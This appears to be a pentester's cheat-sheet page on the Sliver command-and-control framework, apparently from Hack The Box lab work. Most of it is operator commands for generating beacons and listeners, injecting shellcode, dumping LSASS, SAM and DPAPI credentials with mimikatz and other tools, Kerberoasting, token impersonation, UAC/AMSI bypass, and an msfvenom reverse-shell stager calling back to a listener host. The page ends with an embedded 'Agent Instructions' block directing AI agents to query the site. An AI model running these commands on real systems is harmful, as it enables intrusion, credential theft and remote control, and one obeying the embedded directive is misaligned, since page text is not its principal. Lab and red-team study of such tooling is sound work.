# Sliver ## Installation ### Server Setup `Sliver`'s `Server` component has the important role of serving as the location implants will communicate back to. `Sliver`'s `Client` component has the role of being the location the user will execute the commands and tools needed to fulfill their objectives. {% hint style="info" %} A downside of not having a server and a client is that everything runs inside the process of Sliver, meaning that if you accidentally terminate the process, you might lose the beacons or sessions. {% endhint %} {% code fullWidth="false" %} ```sh Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/vx.x.xx/sliver-server_linux Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-server_linux Intrusionz3r0@htb[/htb]$ sudo apt install mingw-w64 ``` {% endcode %} ### **Client Setup** ```sh Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-client_linux Intrusionz3r0@htb[/htb]$ ./sliver-client_linux import Intrusionz3r0_10.10.14.5.cfg 2023/09/27 11:45:03 Saved new client config to: /home/user/.sliver-client/configs/user_ipaddress.cfg Intrusionz3r0@htb[/htb]$ ./sliver-client_linux ``` ### **Operator profile** Sliver can differentiate who can connect based on the generated profile from its server. ```sh [server] sliver > new-operator -n Intrusionz3r0 -l 10.10.14.5 [*] Generating new client certificate, please wait ... [*] Saved new client config to: /opt/silver/Intrusionz3r0_10.10.14.5.cfg ``` ### **Multiplayer mode** `Sliver` can host multiple operators simultaneously in a mode known as [multiplayer](https://sliver.sh/docs?name=Multi-player+Mode). ```sh [server] sliver > multiplayer ``` ## Armory ```sh sliver > armory install seatbelt sliver > armory install sliver > armory install all ``` ## Install external tools ### Example 1: UAC-BOF-Bonanza ```sh Intrusionz3r0@htb[/htb]$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git Intrusionz3r0@htb[/htb]$ cp -rp PATH/UACBypasses/MODULE ~/.sliver-client/extensions/ Intrusionz3r0@htb[/htb]$ cd ~/.sliver-client/extensions/MODULE/; make #Load modules from Sliver sliver > extensions load ~/.sliver-client/extensions/MODULE ``` ### Example 2: Chisel ```sh Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel Intrusionz3r0@htb[/htb]$ cd chisel/ Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel Intrusionz3r0@htb[/htb]$ make windowsdll_64 Intrusionz3r0@htb[/htb]$ make windowsdll_32 Intrusionz3r0@htb[/htb]$ cp chisel.x64.dll ~/.sliver-client/extensions/chisel/ Intrusionz3r0@htb[/htb]$ cp chisel.x86.dll ~/.sliver-client/extensions/chisel/ ``` ## Generate Beacons 
sliver > generate beacon --http <your_server_ip>:<PORT> --os linux --arch x86 --format elf --seconds 5 --jitter 3 
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
sliver > generate beacon --http 10.10.14.62:9002 --skip-symbols -N http-beacon
* `--jitter` introduces randomness to callback times. * `--seconds` sets callback interval. * `--skip-symbols` disables obfuscation (less stealthy). {% hint style="warning" %} One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext. {% endhint %} ### Listeners ```sh sliver > http --lport 8088 sliver > http --lhost 10.10.14.62 --lport 9002 sliver > http sliver > mtls ``` ## Useful commands ### Execute commands ```sh sliver (puppet-mtls) > execte -q cmd '/c ' sliver (puppet-mtls) > execute -o powershell sliver (puppet-mtls) > sharpsh -- '-e -c ' sliver (puppet-mtls) > execute-assembly /home/user/Rubeus.exe sliver (puppet-mtls) > inline-execute-assembly /home/user/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap' ``` {% hint style="warning" %} `execute` command as it will open a command prompt or the tool's GUI. {% endhint %} ### Memory Injection & Shellcode ```sh #Inject shellcode into a new process sliver (puppet-mtls) > execute-assembly /home/Intrusionz3r0/Documents/tools/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe sliver (puppet-mtls) > execute-shellcode -p /home/Intrusionz3r0/Documents/tools/godpotato.bin #Created by donut #Evade Defense loading an executing DLL in a remote process sideload /path/mimikatz.exe "token::elevate privilege::debug sekurlsa::logonpasswords exit" ``` ### Privilege escalation ```sh #From Administrator to NT Authority System sliver (TOTAL_NATIONAL) > getsystem ``` ### Credentials Attacks ```sh #DUMP SAM Database sliver (TOTAL_NATIONAL) > hashdump #Dump LSA secrets sliver (TOTAL_NATIONAL) > ps -e lsass sliver (TOTAL_NATIONAL) > procdump --pid 524 --save /tmp/lsass.dmp #Dump DPAPI creds sliver (puppet-mtls) > sharpdpapi machinecredentials ``` ### Domain Enumeration ```sh #Domain Enumeration sliver (puppet-mtls) > sharp-hound-4 -s -t 300 -- -c all --zipfilename filename #(Compatible: bloodhound-convert or bloodhound-community) sliver (puppet-mtls) > sharpview -- sliver (puppet-mtls) > sharpsh -t 300 -- '-u C:\\temp\\script.ps1 -c Invoke-Method' sliver (puppet-mtls) > sharpsh -t 300 -- '-u PATH/PowerView.ps1 -e -c ' #use base64 command on linux sliver (http-beacon) > c2tc-domaininfo ``` ### Lateral Movement ```sh #Impersonation sliver (http-beacon) > make-token -u svc_sql -p jkhnrjk123! -d dc.domain.local sliver (puppet-mtls) > ps sliver (puppet-mtls) > migrate -p 3908 ``` | **Logon Type** | **Value** | **Description** | **Typical Use Case** | | ------------------------- | --------- | ------------------------------------------------------------------------- | ------------------------------------------------------------------- | | `LOGON_INTERACTIVE` | 2 | Full login session as if from keyboard input. | Run processes locally as a normal user; full access. | | `LOGON_NETWORK` | 3 | For accessing network resources; no full session created. | Access remote shares (e.g. `\\server\share`), no process execution. | | `LOGON_BATCH` | 4 | Used by scheduled tasks or batch jobs. | Run automated tasks with minimal interaction. | | `LOGON_SERVICE` | 5 | Used by services running under a user account. | Run persistent background services. | | `LOGON_UNLOCK` | 7 | Triggered when a user unlocks the workstation. | Not typically used in token impersonation. | | `LOGON_NETWORK_CLEARTEXT` | 8 | Like network logon, but with plaintext password. | Remote authentication requiring cleartext password. | | `LOGON_NEW_CREDENTIALS` | 9 | Credentials used only for outbound connections; local identity unchanged. | `runas /netonly` scenarios; access network as another user. | ### Kerberos ```sh #Kerberoast sliver (http-beacon) > inline-execute-assembly /path/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap' sliver (http-beacon) > c2tc-kerberoast roast alice sliver (http-beacon) > bof-roast rdp/web01.child.htb.local #Delegation sliver (http-beacon) > delegationbof 6 dc.domain.local ``` ### ADSC ```sh #ADCS sliver (http-beacon) > certify -- find sliver (puppet-mtls) > sa-adcs-enum ``` ### Windows Enumeration ```sh #Windows Enumeration sliver (puppet-mtls) > sa-sc-enum #Enum windows services sliver (puppet-mtls) > sa-netshares #Enum network shares SMB sliver (puppet-mtls) > sa-cacls #Enum permissions sliver (puppet-mtls) > sa-probe 10.10.235.135 22 #Check Open ports ``` ### AMSI Bypass ```sh #Bypass AMSI sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe' ``` ## Miscellaneous ### Execute an unmanaged powershell **Project**: [UnmanagedPowerShell](https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file) ```sh ~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41) [ Copyright (c) 2019-2021 TheWover, Odzhan [ Instance type : Embedded [ Module file : "UnmanagedPowerShell.exe" [ Entropy : Random names + Encryption [ File type : EXE [ Target CPU : amd64 [ AMSI/WDLP/ETW : continue [ PE Headers : overwrite [ Shellcode : "UnmanagedPowerShell.bin" [ Exit : Thread ``` ```sh sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin [*] Started remote shell with pid 1888 PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-Y5CPSL66T45 -DATA 10.8.5.48 ``` ### **Create a shellcode with MSFVenom and Silver** We need to create a profile, a stage-listener, a stager and generate a payload through msfvenom. 
Sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
sliver > http -L 10.10.14.5 -l 8088
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt

#Lastly create the payload and replace the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/c2-command-and-control/sliver.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.